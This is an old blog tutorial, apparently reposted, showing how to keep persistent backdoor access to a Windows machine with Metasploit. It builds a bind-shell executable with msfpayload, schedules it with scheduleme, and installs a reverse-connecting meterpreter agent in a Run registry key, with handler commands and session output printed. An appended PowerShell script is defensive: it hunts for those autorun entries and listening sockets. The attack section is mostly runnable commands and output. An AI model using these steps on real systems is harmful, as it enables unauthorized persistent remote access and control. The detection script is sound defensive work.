Auto-starting meterpreter from metasploit
Uncategorized 2012. 3. 13. 13:27
Posted on 25-09-2010
Metasploit: Dropping Backdoor Through a Meterpreter Session.
Filed Under (metasploit, pentesting, security) by admin
First, we create our backdoor.
msfpayload windows/shell_bind_tcp RHOST=192.168.1.100 LPORT=4444 x > evil.exe
RHOST is the remote box where your backdoor will be running, waiting for connections.
Second, use the "scheduleme" script to upload and launch your backdoor. Here the backdoor will execute at user login.
meterpreter > run scheduleme -e evil.exe -l
[*] Checking if UAC is enabled …..
[*] Error Checking UAC: Rex::Post::Meterpreter::RequestError stdapi_registry_create_key: Operation failed: 87
[*] Uploading /root/evil.exe….
[*] /root/evil.exe uploaded!
[*] Scheduling command C:\Users\jorge\AppData\Local\Temp\svhost40.exe to run login…..
[*] The scheduled task has been successfully created
[*] For cleanup run schtasks /delete /tn syscheck22 /F
Third, start a handler, and wait for the user to log in.
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(handler) > set RHOST 192.168.1.100
RHOST => 192.168.1.100
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit -z
[*] Starting the payload handler…
[*] Started bind handler
[*] Command shell session 1 opened (192.168.1.50:53416 -> 192.168.1.100:4444) at 2010-09-26 02:14:32 -0400
[*] Session 1 created in the background.
And you have your backdoor session!
The second method uses meterpreter itself as the backdoor/service; to achieve this we run the "persistence" script.
First, we'll configure the backdoor to run when the user logs on, and to call back to our attacker box on port 443 every 90 seconds.
meterpreter > run persistence -U -i 90 -p 443 -r 192.168.1.50
[*] Creating a persistent agent: LHOST=192.168.1.50 LPORT=443 (interval=10 onboot=true)
[*] Persistent agent script is 614108 bytes long
[*] Uploaded the persistent agent to C:\Users\jorge\AppData\Local\Temp\IzaNxiTRxM.vbs
[*] Agent executed with PID 3544
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\sKYHNhXOcQC
[*] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\sKYHNhXOcQC
[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/persistence/VISTA-VBOX_20100926.3032/clean_up__20100926.3032.rc
Second, start the handler and wait for our session.
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.50
lhost => 192.168.1.50
msf exploit(handler) > set lport 443
lport => 443
msf exploit(handler) > exploit -z
[*] Started reverse handler on 192.168.1.50:443
[*] Starting the payload handler…
[*] Sending stage (748544 bytes) to 192.168.1.100
[*] Meterpreter session 2 opened (192.168.1.50:443 -> 192.168.1.100:49289) at 2010-09-26 02:31:19 -0400
[*] Session 2 created in the background.
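Both methods leave visible footprints on the target: the scheduleme method registers a scheduled task that runs an executable out of the user's Temp directory at logon, the persistence method writes an HKCU\...\Run value that launches a .vbs from the same place, and the bind-shell variant leaves a listening socket owned by that dropped executable. The following PowerShell check, an added example that is not part of the original post nor of Metasploit, is the hunt a defender would run on a host to surface those artifacts. Because the file names, task names and value names are random (svhost40.exe, syscheck22 and sKYHNhXOcQC above), it matches on where an autorun entry executes from rather than on any name. It assumes Windows PowerShell 5.1 or later, a Windows 8 / Server 2012 or newer host for Get-ScheduledTask and Get-NetTCPConnection, and that it runs in the context of the user whose HKCU hive is being inspected.

```powershell
# Added example (not from the original post): look for autorun entries and listeners
# that execute from user-writable locations, which is where the scheduleme and
# persistence scripts above drop their payloads. Assumes Windows PowerShell 5.1+.

# Locations a non-admin user can write to; the post's artifacts all live under Temp.
$userWritable = @(
    [regex]::Escape($env:TEMP),
    [regex]::Escape("$env:LOCALAPPDATA\Temp"),
    [regex]::Escape($env:APPDATA),
    'C:\\Users\\[^\\]+\\AppData\\'
)
$locationPattern = ($userWritable -join '|')

function Test-SuspiciousCommand {
    param([string]$Command)
    if ([string]::IsNullOrWhiteSpace($Command)) { return $false }
    # A script host launching an interpreted payload (persistence drops a .vbs).
    $scriptHost = $Command -match '(?i)\b(wscript|cscript|mshta)(\.exe)?\b.*\.(vbs|js|hta)\b'
    # Anything executed from a user-writable directory.
    $fromTemp = $Command -match "(?i)$locationPattern"
    return ($scriptHost -or $fromTemp)
}

$findings = @()
$providerProps = @('PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider')

# 1. Run keys. persistence writes HKCU\...\Run; HKLM is checked as well for the elevated case.
$runKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)
foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $values = Get-ItemProperty -Path $key
    foreach ($prop in $values.PSObject.Properties) {
        if ($providerProps -contains $prop.Name) { continue }   # skip provider metadata
        if (Test-SuspiciousCommand $prop.Value) {
            $findings += [pscustomobject]@{
                Source  = 'RunKey'
                Name    = "$key\$($prop.Name)"
                Command = $prop.Value
            }
        }
    }
}

# 2. Scheduled tasks. scheduleme registers a logon task that runs an exe from Temp.
foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
    foreach ($action in $task.Actions) {
        $cmd = "$($action.Execute) $($action.Arguments)"
        if (Test-SuspiciousCommand $cmd) {
            $findings += [pscustomobject]@{
                Source  = 'ScheduledTask'
                Name    = "$($task.TaskPath)$($task.TaskName)"
                Command = $cmd.Trim()
            }
        }
    }
}

# 3. Listening sockets owned by a process running from a user-writable location
#    (the bind-shell backdoor of the first method listens on the target, port 4444 above).
foreach ($conn in Get-NetTCPConnection -State Listen -ErrorAction SilentlyContinue) {
    $proc = Get-Process -Id $conn.OwningProcess -ErrorAction SilentlyContinue
    if ($proc -and $proc.Path -and ($proc.Path -match "(?i)$locationPattern")) {
        $findings += [pscustomobject]@{
            Source  = 'ListeningProcess'
            Name    = "$($proc.ProcessName) (PID $($proc.Id)) port $($conn.LocalPort)"
            Command = $proc.Path
        }
    }
}

if ($findings.Count -eq 0) {
    Write-Output 'No autorun entries or listeners launching from user-writable locations.'
} else {
    $findings | Format-Table -AutoSize
}
```

Run it as the logged-on user, since HKCU resolves to that user's hive; for other profiles on the same machine the corresponding NTUSER.DAT hive has to be loaded first. A hit under Source RunKey or ScheduledTask corresponds directly to the cleanup commands the post prints (schtasks /delete /tn <taskname> /F for the task, and the generated clean_up .rc for the registry value and the dropped .vbs), so the same check doubles as verification that the cleanup actually removed the entries.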